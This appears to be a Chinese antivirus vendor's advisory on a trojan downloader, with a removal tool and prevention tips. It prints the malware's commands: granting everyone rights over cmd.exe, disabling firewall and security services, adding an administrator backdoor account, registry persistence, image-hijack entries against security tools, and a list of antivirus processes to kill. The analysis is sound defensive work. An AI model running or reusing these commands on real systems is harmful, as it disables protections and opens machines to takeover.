“延迟下载器81920”木马专杀
病毒介绍:
病毒名称:延迟下载器81920
病毒别名:Win32.Troj.VB.kr.81920
威胁级别:★☆☆☆☆
病毒类型:木马下载器
病毒长度:81920
影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:
这是个木马下载器.它会将自己设为管理员权限,映像劫持大量的杀毒软件.然后从指定网址下载大量其它木马程序.为确保能完全清除自己可能受到的威胁,病毒建立映像劫持,劫持名单中包括了知名品牌的安全产品,以及一些系统安全工具.解决掉安全软件的威胁,病毒就从指定地址下载一份病毒列表,以vbb.exe的名称保存到%windows\%system32\目录下运行,然后利用它下载更多其它病毒.该毒也试图中止毒霸的进程,不过经检验无效.
病毒具体运行原理如下:
1、运行后首先Sleep(),挂起10分钟.然后下载病毒列表.这个下载器在进入用户电脑后,不会马上运行,它会先等待10分钟.10分钟后,病毒运行起来,它会查找并强行中止麦咖啡、瑞星、木马克星、360安全卫士等安全软件的进程,以便自己随后的行动能顺利完成.如果发现一些具有主动防御功能的安全软件无法中止,那么它还会连接病毒作者指定的地址,下载相应的驱动文件来恢复SSDT表.
2. cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F
更改cmd权限为所有用户可以执行
执行 cmd.exe /c net stop wscsvc&
net stop sharedaccess&
sc config sharedaccess start=disabled&
终止或禁用一些服务
3.查找并终止以下进程shstat.exe, runiep.exe, ras.exe, MPG4C32.exe,
imsins.exe, Iparmor.exe, 360safe.exe, 360tray.exe, kmailmon.exe,
kavstart.exe, cacls.exe, cmd.exe.
4.查找杀软ccenter.exe,如果找到下载
保存到C:\windows\system32\rav.exe执行.
rav.exe会生成C:\windows\system32\ressdt.exe
注册ressdt.sys驱动,恢复ssdt,然后del ressdt.exe
5.读取并下载的病毒列表,并执行,实际读出的是0.下载到本地C:\windows\system32\vbb.exe并执行,这个vbb.exe会下载一些其他的病毒.
6.写入注册表自启动
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\SoundMan
删除一下注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\
360Safetray
KavPFW
7.添加一个用户new1密码12369到管理员组
cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators new1 /add
8.通过写入一个1.inf的文件并执行,注册为服务启动,替换原系统服务键值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Service\helpsvc
原键值%SystemRoot%\System32\svchost.exe -k netsvcs
为%SystemRoot%\System32\interne.exe
其执行的语句如下:
cmd /c echo [Version]>%windir%\1.inf&
echo Signature=”$WINDOWS NT$”>>%windir%\1.inf&
echo [DefaultInstall.Services]>>%windir%\1.inf&
9.映像劫持,导致一些安全工具打不开.
cftmon.exe\debugger=soundman.exe
360tray.exe=svchost.exe
360safe.exe=svchost.exe
360Loader.exe=svchost.exe
该毒也试图中止毒霸的进程,不过经检验无效.
专家预防建议:
1.建立良好的安全习惯,不打开可疑邮件和可疑网站.
2.不要随意接收聊天工具上传送的文件以及打开发过来的网站链接.
3.使用移动介质时最好使用鼠标右键打开使用,必要时先要进行扫描.
4.现在有很多利用系统漏洞传播的病毒,所以给系统打全补丁也很关键.
5.安装专业的防毒软件升级到最新版本,并开启实时监控功能.
6.为本机管理员帐号设置较为复杂的密码,预防病毒通过密码猜测进行传播,最好是数字与字母组合的密码.
7.不要从不可靠的渠道下载软件,因为这些软件很可能是带有病毒的.
更多资讯请登陆金山毒霸官方网站查询:www.kingsoft2008.net.cn
专杀下载
